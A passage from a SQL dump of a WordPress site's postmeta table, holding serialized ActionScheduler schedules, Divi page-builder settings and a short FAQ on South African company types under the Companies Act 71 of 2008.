terval_in_seconds\";i:3600;}'),(19326,32719,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1565769033;}'),(19328,28,'_et_builder_version','BB|Divi|3.26.6'),(19329,28,'_et_pb_first_image',''),(19330,28,'_et_pb_truncate_post',''),(19331,28,'_et_pb_ab_stats_refresh_interval','hourly'),(19332,28,'_et_pb_old_content',''),(19333,28,'_et_pb_enable_shortcode_tracking',''),(19334,28,'_et_pb_custom_css',''),(19335,28,'_et_pb_gutter_width','3'),(19336,32720,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565774450;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19337,32721,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565774451;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19338,32714,'_et_pb_built_for_post_type','page'),(19339,32714,'_et_pb_ab_subjects',''),(19340,32714,'_et_pb_enable_shortcode_tracking',''),(19341,32714,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"32714\" /]'),(19342,32714,'_et_pb_custom_css',''),(19343,32714,'_et_pb_gutter_width','3'),(19344,32714,'_thumbnail_id',''),(19345,32714,'_et_pb_first_image',''),(19346,32714,'_et_pb_truncate_post',''),(19347,32714,'_et_builder_version','VB|Divi|3.26.6'),(19348,32714,'_et_pb_show_page_creation','off'),(19349,32724,'_edit_lock','1565772686:3'),(19350,32724,'_et_pb_use_builder','on'),(19351,32724,'_edit_last','3'),(19352,32724,'_et_pb_post_hide_nav','default'),(19353,32724,'_et_pb_page_layout','et_right_sidebar'),(19354,32724,'_et_pb_side_nav','off'),(19355,32724,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:3:{s:10:\"et-gf-lato\";s:75:\"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"devanagari\";}}'),(19356,32724,'_et_pb_built_for_post_type','page'),(19357,32724,'_et_pb_ab_subjects',''),(19358,32724,'_et_pb_enable_shortcode_tracking',''),(19359,32724,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"32724\" /]'),(19360,32724,'_et_pb_custom_css',''),(19361,32724,'_et_pb_gutter_width','3'),(19362,32724,'_thumbnail_id',''),(19363,32724,'_et_pb_first_image',''),(19364,32724,'_et_pb_truncate_post',''),(19365,32724,'_et_builder_version','VB|Divi|3.26.6'),(19366,32724,'_et_pb_show_page_creation','off'),(19367,32730,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565778061;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19368,32731,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565778061;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19369,32732,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565781668;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19370,32733,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565781668;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19371,32734,'_edit_lock','1565778708:3'),(19372,32734,'_et_pb_use_builder','on'),(19373,32734,'_edit_last','3'),(19374,32734,'_et_pb_post_hide_nav','default'),(19375,32734,'_et_pb_page_layout','et_right_sidebar'),(19376,32734,'_et_pb_side_nav','off'),(19377,32734,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:3:{s:10:\"et-gf-lato\";s:75:\"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"devanagari\";}}'),(19378,32736,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565785278;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19379,32737,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565785278;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19380,32738,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565788883;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19381,32739,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565788883;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19382,32740,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565792494;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19383,32741,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565792494;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19384,32742,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565796100;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19385,32743,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565796100;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}');
INSERT INTO `wpxb_postmeta` VALUES (19386,32744,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565804527;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19387,32745,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565804527;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19388,32746,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565809139;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19389,32747,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565809139;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19390,32748,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565812923;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19391,32749,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565812923;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19392,32750,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565816609;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19393,32751,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565816609;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19394,32752,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565826241;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19395,32753,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565826241;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19396,32754,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565832169;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19397,32755,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565832170;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19398,32756,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565836255;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19399,32757,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565836255;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19400,32758,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565839930;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19401,32759,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565839930;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19402,32760,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565844468;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19403,32761,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565844468;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19404,32762,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565853243;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19405,32763,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565853243;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19406,32764,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565856885;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19407,32765,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565856885;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19408,357,'_et_pb_use_builder','on'),(19409,357,'_et_pb_show_page_creation','off'),(19410,357,'_et_pb_old_content','[su_accordion]\r\n\r\n[su_spoiler title=\"What type of companies that can be registered in terms of the New Companies Act 71, 2008?\" style=\"fancy\"]\r\n<ul>\r\n	<li>Private company (Pty) Ltd</li>\r\n	<li>Public company (Ltd)</li>\r\n	<li>State-owned company (SOC)</li>\r\n	<li>External company</li>\r\n	<li>Personal liability company (Inc)</li>\r\n	<li>Non-profit company (NPC) [/su_spoiler]</li>\r\n</ul>\r\n[su_spoiler title=\"What is a private company?\" style=\"fancy\"]Private companies are comparable to companies of the same status under the Companies Act, 1973 and are characterised by the following:\r\n\r\nThey are subject to fewer disclosure and transparency requirements.\r\nA private company will still be prohibited from offering its shares to the public and the transferability of its shares will be restricted, but it may now have more than 50 shareholders.\r\nThe name of a private company must end with the expression “Proprietary Limited” or its abbreviation “(Pty) Ltd”.\r\nThe board of a private company must comprise at least one director, or any other minimum number as stipulated in its MOI. Each incorporator is a first director of the company.\r\n[/su_spoiler]\r\n\r\n&nbsp;\r\n\r\n[/su_accordion]\r\n\r\n&nbsp;'),(19412,357,'_et_pb_built_for_post_type','page'),(19414,357,'_et_pb_ab_subjects',''),(19415,357,'_et_pb_enable_shortcode_tracking',''),(19416,357,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"357\" /]'),(19417,357,'_et_pb_custom_css',''),(19418,357,'_et_pb_gutter_width','3'),(19419,357,'_thumbnail_id',''),(19424,32772,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565860541;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19421,357,'_et_pb_first_image',''),(19422,357,'_et_pb_truncate_post','<div class=\"et_pb_section et_pb_section_0 et_section_regular\">\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_0\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_0  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_0 et_pb_bg_layout_light  et_pb_text_align_left\">\n				\n				\n				<div class=\"et_pb_text_inner\">\n					What type of companies that can be registered in terms of the New Companies Act 71, 2008</p>\n<p>Private company (Pty) Ltd<br />\nPublic company (Ltd)<br />\nState-owned company (SOC)<br />\nExternal company<br />\nPersonal liability company (Inc)<br />\nNon-profit company (NPC) </p>\n<p>What is a private companyPrivate companies are comparable to companies of the same status under the Companies Act, 1973 and are characterised by the following:<br />\nThey are subject to fewer disclosure and transparency requirements. A private company will still be prohibited from offering its shares to the public and the transferability of its shares will be restricted, but it may now have more than 50 shareholders. The name of a private company must end with the expression “Proprietary Limited” or its abbreviation “(Pty) Ltd”. The board of a private company must comprise at least one director, or any other minimum number as stipulated in its MOI. Each incorporator is a first director of the company.<br />\n&nbsp;\n				</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section -->\n<span class=\"et_bloom_bottom_trigger\"></span>'),(19423,357,'_et_builder_version','VB|Divi|3.26.6'),(19425,32773,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565860541;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19426,32774,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565864167;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19427,32775,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565864168;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19428,74,'_et_pb_use_builder',''),(19429,74,'_et_builder_version','BB|Divi|3.26.6'),(19430,74,'_et_pb_first_image',''),(19431,74,'_et_pb_truncate_post',''),(19432,74,'_et_pb_ab_stats_refresh_interval','hourly'),(19433,74,'_et_pb_old_content',''),(19434,74,'_et_pb_enable_shortcode_tracking',''),(19435,74,'_et_pb_custom_css',''),(19436,74,'_et_pb_gutter_width','3'),(19437,30118,'_et_pb_gutter_width','3'),(19438,32787,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565867785;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19439,32788,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565867785;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19440,32798,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565871394;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19441,32799,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565871394;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19442,32800,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565875915;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19443,32801,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565875916;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19444,32815,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565879544;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19445,32816,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565879544;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19446,32822,'_et_pb_built_for_post_type','page'),(19447,32830,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565884943;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19448,32831,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565884943;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19449,32832,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565889117;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19450,32833,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565889118;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19451,32834,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565894570;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19452,32835,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565894570;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19453,32836,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565898979;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19454,32837,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565898979;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19455,32838,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565903191;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19456,32839,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565903191;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19457,32840,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565907723;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19458,32841,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565907723;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19459,32842,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565912166;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19460,32843,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565912166;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19461,32844,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565916224;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19462,32845,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565916224;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19463,32846,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565921419;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19464,32847,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565921419;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19465,32848,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565925429;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19466,32849,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565925429;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19467,32850,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565929433;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19468,32851,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565929433;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19469,32852,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565933564;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19470,32853,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565933564;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19471,32854,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565937950;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19472,32855,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565937950;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19473,32856,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565941591;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19474,32857,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565941591;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19475,32859,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565945245;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19476,32860,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565945245;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19477,32734,'_wp_trash_meta_status','draft'),(19478,32734,'_wp_trash_meta_time','1565942039'),(19479,32734,'_wp_desired_post_slug',''),(19480,32864,'_edit_lock','1565942074:3'),(19481,32864,'_et_pb_use_builder','on'),(19482,32864,'_edit_last','3'),(19483,32864,'_et_pb_post_hide_nav','default'),(19484,32864,'_et_pb_page_layout','et_right_sidebar'),(19485,32864,'_et_pb_side_nav','off'),(19486,32864,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:4:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";s:10:\"et-gf-lato\";s:75:\"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic\";}s:6:\"subset\";a:4:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"devanagari\";}}'),(19487,32867,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565949657;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19488,32868,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565949657;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19489,32869,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565954454;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19490,32870,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565954454;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19491,32871,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565958364;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19492,32872,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565958364;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19493,32873,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s: